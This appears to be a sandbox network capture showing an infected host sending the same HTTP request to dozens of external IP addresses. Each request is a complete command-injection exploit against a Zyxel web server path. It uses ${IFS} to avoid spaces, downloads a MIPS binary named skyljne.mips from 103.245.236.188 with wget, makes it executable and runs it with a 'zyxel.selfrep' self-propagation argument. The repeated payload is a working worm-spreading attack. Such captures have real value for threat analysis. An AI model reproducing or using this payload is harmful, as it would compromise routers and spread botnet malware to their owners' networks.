                                                Jan 12, 2024 18:24:37.908247948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4915192.168.2.1340040166.32.17.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908250093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4916192.168.2.1334956135.6.168.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908299923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4917192.168.2.135097067.215.153.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908366919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4918192.168.2.1352620188.137.62.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908420086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4919192.168.2.135387625.54.32.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908438921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4920192.168.2.1348136180.239.228.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908507109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4921192.168.2.136030078.88.40.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908536911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4922192.168.2.1349546174.85.174.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908555031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4923192.168.2.1354132159.104.190.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908627033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4924192.168.2.1344736208.134.205.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908678055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4925192.168.2.134261284.20.151.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908711910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4926192.168.2.1347472194.131.82.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908760071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4927192.168.2.1334456203.88.193.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908793926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4928192.168.2.133796446.191.213.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908829927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4929192.168.2.1354554117.223.57.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908864021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4930192.168.2.133842484.54.8.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908930063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4931192.168.2.1338548150.77.39.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908972979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4932192.168.2.134596076.51.197.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909015894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4933192.168.2.134137896.18.238.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909050941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4934192.168.2.1336150178.183.206.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909094095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4935192.168.2.1341260185.48.148.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909140110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4936192.168.2.134782620.8.22.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909184933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4937192.168.2.1351066206.249.119.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909212112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4938192.168.2.1334054196.51.9.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909256935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4939192.168.2.1359386185.24.201.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909280062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4940192.168.2.13417388.151.218.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909291983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4941192.168.2.135324675.163.166.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909349918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4942192.168.2.1339334142.149.193.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909399986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4943192.168.2.1335262154.186.95.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909452915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4944192.168.2.1353576192.125.102.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909482002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4945192.168.2.1356494205.203.166.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909533978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4946192.168.2.1336064175.101.223.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909554958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4947192.168.2.1336892170.102.159.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909595966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4948192.168.2.1341678157.60.248.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909643888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4949192.168.2.134661098.103.167.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909692049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4950192.168.2.133586683.24.144.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909728050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4951192.168.2.1357752146.116.9.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909775972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4952192.168.2.1359382147.205.230.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909811974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4953192.168.2.1360180218.41.23.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909849882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4954192.168.2.136025692.69.104.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909878016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4955192.168.2.1357124180.252.164.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909943104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4956192.168.2.1334062188.104.53.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.909975052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4957192.168.2.134580038.143.226.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910008907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4958192.168.2.1346798151.222.116.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910053015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4959192.168.2.1355756121.195.135.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910095930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4960192.168.2.1335904124.72.175.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910131931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4961192.168.2.1333014197.110.112.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910156965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4962192.168.2.135976088.252.156.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910198927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4963192.168.2.135992867.132.131.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910229921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4964192.168.2.135699452.34.83.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910299063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4965192.168.2.135433460.96.243.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910321951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4966192.168.2.1350826115.237.203.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910358906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4967192.168.2.1356678210.95.174.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910412073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4968192.168.2.1359966143.230.104.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910437107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4969192.168.2.135809020.132.191.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910485983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4970192.168.2.133471459.114.10.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910520077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4971192.168.2.1342960206.118.58.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910557032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4972192.168.2.1351596101.166.154.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910600901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4973192.168.2.1336746210.71.144.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910624027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4974192.168.2.1355464211.211.213.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910682917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4975192.168.2.1337850131.47.7.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910716057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4976192.168.2.1337902123.78.124.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910748959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4977192.168.2.133572639.8.81.170443
                                                TimestampBytes transferredDirectionData
